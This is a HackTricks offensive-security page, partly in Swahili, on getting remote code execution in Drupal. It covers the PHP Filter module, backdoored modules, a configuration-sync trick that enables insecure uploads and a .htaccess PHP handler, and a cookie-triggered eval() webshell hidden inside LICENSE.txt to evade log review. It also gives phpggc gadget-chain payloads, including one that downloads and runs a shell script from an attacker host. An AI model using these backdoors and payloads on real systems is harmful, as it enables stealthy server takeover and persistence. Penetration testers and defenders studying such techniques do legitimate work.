Drupal RCE

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

With PHP Filter Module

Warning

Katika matoleo ya zamani ya Drupal (before version 8), ilikuwa inawezekana kuingia kama admin na kuwezesha the PHP filter module, ambayo β€œAllows embedded PHP code/snippets to be evaluated.” Lakini tangu version 8 module hii haisakinishiwi kwa default.

  1. Go to /modules/php and if a 403 error is returned then the PHP filter plugin is installed and you can continue
  2. If not, go to Modules and check on the box of PHP Filter and then on Save configuration
  3. Then, to exploit it, click on Add content , then Select Basic Page or Article and write the PHP backdoor, then select PHP code in Text format and finally select Preview
  4. To trigger it, just access the newly created node:
curl http://drupal.local/node/3

Sakinisha Moduli ya PHP Filter

Warning

Katika matoleo ya sasa hawezi tena kusakinishwa plugins kwa kuwa na ufikiaji wa wavuti pekee baada ya usakinishaji wa chaguo-msingi.

Kuanzia toleo 8 na kuendelea, PHP Filter moduli haijasakinishwa kwa chaguo-msingi. Ili kutumia uwezo huu, tutalazimika kusakinisha moduli wenyewe.

  1. Pakua toleo la hivi karibuni zaidi la moduli kutoka kwenye tovuti ya Drupal.
  2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
  3. Baada ya kupakuliwa nenda kwenye Administration > Reports > Available updates.
  4. Bonyeza Browse, chagua faili kutoka kwenye saraka tuliyopakulia, kisha bonyeza Install.
  5. Baada moduli isakinishwe, tunaweza kubonyeza Content na kuunda ukurasa mpya wa msingi (basic page), sawa na jinsi tulivyofanya katika mfano wa Drupal 7. Tena, hakikisha uchague PHP code kutoka kwenye menyu ya Text format.

Backdoored Module

Warning

Katika matoleo ya sasa hawezi tena kusakinishwa plugins kwa kuwa na ufikiaji wa wavuti pekee baada ya usakinishaji wa chaguo-msingi.

Ilikuwa inawezekana kupakua module, kuiongeza backdoor ndani yake na kuisakinisha. Kwa mfano, kupakua moduli ya Trurnstile katika muundo ulioshinikizwa, kuunda faili mpya ya backdoor ya PHP ndani yake, na kuruhusu ufikiaji wa faili ya PHP kwa kutumia faili .htaccess:

<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / </IfModule>

Na kisha kwenda http://drupal.local/admin/modules/install ili kufunga backdoored module na kufikia /modules/turnstile/back.php ili kuitekeleza.

Backdooring Drupal with Configuration synchronization

Post shared by Coiffeur0x90

Part 1 (kuwasha Media na Media Library)

Katika menyu ya Extend (/admin/modules), unaweza kuwezesha vitu vinavyoonekana kuwa plugins ambazo tayari zimewekwa. Kwa default, plugins Media na Media Library hazionekani kuwa zimewezeshwa, kwa hivyo tuziwezeshe.

Before activation:

After activation:

Part 2 (kutumia kipengele Configuration synchronization)

Tutatumia kipengele cha Configuration synchronization kusafirisha (export) na kupakia (import) entry za configuration za Drupal:

  • /admin/config/development/configuration/single/export
  • /admin/config/development/configuration/single/import

Fanyia patch system.file.yml

Tuanze kwa kupatch entry ya kwanza allow_insecure_uploads kutoka:

File: system.file.yml


...

allow_insecure_uploads: false

...

Kwa:

Faili: system.file.yml


...

allow_insecure_uploads: true

...

Sahihisha field.field.media.document.field_media_document.yml

Kisha, rekebisha kipengele cha pili file_extensions kutoka:

Faili: field.field.media.document.field_media_document.yml


...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Kwa:

File: field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Sitatumii hii kwenye blogpost hii lakini imetajwa kuwa inawezekana kufafanua kipengee file_directory kwa njia ya hiari na kwamba ina udhaifu kwa path traversal attack (kwa hivyo tunaweza kurudi juu ndani ya mti wa mfumo wa faili wa Drupal).

Sehemu 3 (kutumia kipengele Ongeza Nyaraka)

Hatua ya mwisho ni rahisi zaidi, na imegawanywa katika hatua ndogo mbili. Ya kwanza ni kupakia faili katika muundo wa .htaccess ili kutumia maelekezo ya Apache na kuruhusu faili za .txt kutafsiriwa na PHP engine. Ya pili ni kupakia faili ya .txt yenye payload yetu.

Faili: .htaccess

<Files *>
SetHandler application/x-httpd-php
</Files>

# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>

Kwa nini ujanja huu ni mzuri?

Kwa sababu mara Webshell (tutayoiita LICENSE.txt) inapowekwa kwenye Web server, tunaweza kutuma amri zetu kupitia $_COOKIE na kwenye Web server logs, hii itaonekana kama ombi halali la GET kwa faili ya maandishi.

Kwa nini kuitwa Webshell yetu LICENSE.txt?

Kwa sababu tu, ikiwa tuchukue faili ifuatayo, kwa mfano core/LICENSE.txt (ambayo tayari ipo ndani ya Drupal core), tuna faili ya mistari 339 na ukubwa wa 17.6 KB, ambayo ni kamili kwa kuongeza kipande kidogo cha PHP katikati (kwa sababu faili ni kubwa vya kutosha).

Faili: Patched LICENSE.txt


...

this License, you may choose any version ever published by the Free Software
Foundation.

<?php

# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}

?>

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author

...

Part 3.1 (pakia faili .htaccess)

First, we leverage the Add Document (/media/add/document) feature to upload our file containing the Apache directives (.htaccess).

Part 3.2 (pakia faili LICENSE.txt)

Then, we leverage the Add Document (/media/add/document) feature again to upload a Webshell hidden within a license file.

Part 4 (maingiliano na Webshell)

The last part consists of interacting with the Webshell.

As shown in the following screenshot, if the cookie expected by our Webshell is not defined, we get the subsequent result when consulting the file via a Web browser.

When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants.

And as you can see in the logs, it looks like only a txt file has been requested.

Thank you for taking the time to read this article, I hope it will help you get some shells.

Drupal core gadget chain (SA-CORE-2024-007 / SA-CORE-2024-008)

Two advisories published 20 Nov 2024 (CVE-2024-55637 & CVE-2024-55638) describe new PHP object gadget chains in Drupal core (7.0–7.101, 8.x, 10.2.0–10.2.10, 10.3.0–10.3.8, early 11.x). They are not directly exploitable but give attackers a ready-made chain once any contrib/module performs unserialize() on user input.

Practical exploitation workflow:

  1. Tafuta sink ya unserialize (contrib module or custom code). Grep codebase for unserialize( or Drupal\Component\Serialization\PhpSerialize::decode. Target endpoints that accept POST/JSON or configuration imports.
  2. Generate a payload using the vulnerable class path that matches the gadget chain. After SA-CORE-2024-008, the public chain was added to common payload generators. Example with PHPGGC (commit β‰₯ Dec 2024):
./phpggc drupal/rce2 system 'id' > payload.ser
  1. Deliver the serialized blob kwenye sink (kwa mfano, parameter inayodeserialized). Kwa form-encoded body:
curl -X POST https://target/admin/config/some/module \
-d "serialized_setting=$(cat payload.ser)"
  1. Sababisha uharibifu (mara nyingi hua kwa kiotomatiki mwishoni mwa ombi) na tekeleza amri.

Vidokezo vya upimaji:

  • Gadget inafanya kazi tu kwenye matoleo kabla ya 10.2.11 / 10.3.9 / 7.102 (zimepitishwa marekebisho ya usalama). Thibitisha toleo la lengo kupitia /core/lib/Drupal.php au CHANGELOG.txt.
  • Madereva ya DB ya wahusika wa tatu yanaweza kuhitaji uimarishaji zaidi; tazama deployments ambazo ziliruka dirisha la masasisho ya usalama.

Recent contrib-module unsafe deserialization β†’ RCE

Moduli kadhaa za contrib zilisahihisha njia zisizo salama za unserialize() mwishoni mwa 2024. Ikiwa tovuti haijapata masasisho haya, zinakupa exploitable sink inayohitajika na core gadget chain:

  • Mailjet (<4.0.1, CVE-2024-13296): data inayodhibitiwa na admin inapitishwa kwa unserialize(), ikiruhusu PHP Object Injection β†’ RCE wakati imekandamana na core gadgets.
  • Eloqua (7.x-1.x < 1.15, CVE-2024-13297): matumizi sawa ya unserialize() yasiyo salama yanayoweza kufikiwa na watumiaji wenye access administration pages.

Wazo la kujaribu (iliyothibitishwa):

phpggc drupal/rce2 system 'bash -c "curl http://attacker/shell.sh|sh"' > p.ser
curl -b session=ADMINCOOKIE \
-F "import=@p.ser" https://target/admin/config/eloqua/import

Ikiwa module inafanya deserialization ya data iliyopakiwa, gadget chain inaleta RCE. Changanya na XSS/CSRF ili kuiba cookies za admin kwa mlolongo kamili wa shambulio.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks